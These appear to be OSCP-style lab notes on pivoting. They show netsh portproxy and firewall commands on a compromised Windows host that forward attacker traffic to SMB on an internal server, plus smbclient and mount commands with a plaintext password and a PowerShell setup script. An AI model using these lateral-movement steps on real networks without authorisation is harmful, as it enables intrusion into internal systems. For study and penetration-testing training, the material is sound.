The Windows host is compromised and we have escalated privileges (local administrator; both netsh portproxy and firewall changes require it). Besides being connected to the current network (10.11.0.x), it has a second network interface attached to a different, internal network (192.168.1.x). On that internal subnet we identify a Windows Server 2016 machine (192.168.1.110) with TCP port 445 (SMB) open. Our attacking Linux machine on 10.11.0.x cannot reach 192.168.1.110 directly, so we forward through the compromised host. (netsh portproxy has some prerequisites, e.g. the IPv6 stack must be installed on the host because portproxy depends on it; see the OSCP material.)
- We use the netsh interface portproxy context to add an IPv4-to-IPv4 (v4tov4) proxy that listens on 10.11.0.22 (listenaddress=10.11.0.22), port 4455 (listenport=4455), and forwards to the Windows Server 2016 host (connectaddress=192.168.1.110) on port 445 (connectport=445):
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
- The Windows firewall blocks inbound connections to TCP port 4455 by default, so add an allow rule for it (the rule is scoped to the listening address and port so nothing else is exposed):
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow
- On the Linux side, configure Samba so that smbclient negotiates a protocol the server accepts (for example, set min protocol = SMB2 in the [global] section of /etc/samba/smb.conf). The forwarded port on 10.11.0.22 now behaves like a local port forward to 192.168.1.110:445.
- Check that the tunnel works by listing shares through the forwarded port: smbclient -L 10.11.0.22 --port=4455 --user=Administrator
- smbclient returns an error when it tries to enumerate workgroups; this only prevents the workgroup listing and does not affect our ability to mount the share.
sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455,username=Administrator,password=Qwerty09! //10.11.0.22/<sharename> /mnt/win10_share
ls -l /mnt/win10_share/
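The Windows side of the procedure above, as an added PowerShell example (not from the original notes or the OSCP material). It assumes the same addresses and ports as the notes, that it is run from an elevated PowerShell on the compromised host, and it adds the verification and cleanup steps the notes omit; the function and variable names are my own.

```powershell
# Added example: set up, verify and later tear down the netsh portproxy and
# firewall rule from the notes above. Run as Administrator on the compromised host.
# Addresses and ports are taken from the notes (assumed values).
$ListenAddr = '10.11.0.22'
$ListenPort = 4455
$TargetAddr = '192.168.1.110'
$TargetPort = 445
$RuleName   = 'forward_port_rule'

function Enable-PortForward {
    # netsh portproxy relies on the IP Helper service (iphlpsvc), which needs the
    # IPv6 stack; warn early if it is missing instead of debugging a silent failure.
    if (-not (Get-Service iphlpsvc -ErrorAction SilentlyContinue)) {
        Write-Warning 'IP Helper service (iphlpsvc) not found; portproxy will not work.'
    }
    netsh interface portproxy add v4tov4 listenport=$ListenPort listenaddress=$ListenAddr connectport=$TargetPort connectaddress=$TargetAddr
    # Allow inbound TCP to the listener only, scoped to the listening address/port.
    netsh advfirewall firewall add rule name="$RuleName" protocol=TCP dir=in localip=$ListenAddr localport=$ListenPort action=allow
}

function Test-PortForward {
    # Show the proxy table entry.
    netsh interface portproxy show v4tov4
    # Confirm the listener is actually bound on the external interface.
    $listener = Get-NetTCPConnection -LocalAddress $ListenAddr -LocalPort $ListenPort -State Listen -ErrorAction SilentlyContinue
    if ($listener) {
        "Listener bound on ${ListenAddr}:${ListenPort}"
    } else {
        Write-Warning 'No listener bound; check that IPv6 / IP Helper is installed.'
    }
    # Confirm the host itself can reach the target; if this fails the proxy will
    # accept connections from Kali but the forwarded connection will fail.
    Test-NetConnection -ComputerName $TargetAddr -Port $TargetPort
}

function Disable-PortForward {
    # Remove the forward and close the firewall hole once this step is finished.
    netsh interface portproxy delete v4tov4 listenport=$ListenPort listenaddress=$ListenAddr
    netsh advfirewall firewall delete rule name="$RuleName"
}

Enable-PortForward
Test-PortForward
# Disable-PortForward   # run when the forward is no longer needed
```

Test-PortForward is worth running before touching smbclient: a bound listener plus a successful Test-NetConnection to 192.168.1.110:445 means any remaining failure is on the SMB protocol negotiation side rather than in the forward itself.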